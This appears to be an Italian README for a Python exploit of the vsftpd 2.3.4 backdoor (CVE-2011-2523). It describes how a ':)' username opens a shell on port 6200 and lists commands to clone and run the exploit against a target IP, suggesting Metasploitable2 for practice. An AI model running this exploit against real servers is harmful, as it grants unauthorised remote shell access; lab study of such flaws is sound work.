
Exploit in Python per vsftpd 2.3.4 - Esecuzione di comandi backdoor
vsftpd, che sta per Very Secure FTP Daemon, è un server FTP per sistemi Unix-like, incluso Linux. È concesso in licenza sotto GNU General Public License. Supporta IPv6 e SSL.
Nel luglio 2011, è stato scoperto che la versione 2.3.4 di vsftpd scaricabile dal sito principale era stata compromessa. Gli utenti che accedono a un server vsftpd-2.3.4 compromesso possono inserire una faccina :) come nome utente e ottenere una shell di comando sulla porta 6200. Non si trattava di una vulnerabilità di sicurezza in vsftpd; piuttosto, qualcuno aveva caricato una versione diversa di vsftpd che conteneva una backdoor. Da allora, il sito è stato spostato su Google App Engine.
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/padsalatushal/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP
Esempio : python3 exploit.py -host 192.168.168.128

Puoi testare l'exploit su Metasploitable2
https://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson8/index.html https://subscription.packtpub.com/book/networking_and_servers/9781786463166/1/ch01lvl1sec18/vulnerability-analysis-of-vsftpd-2-3-4-backdoor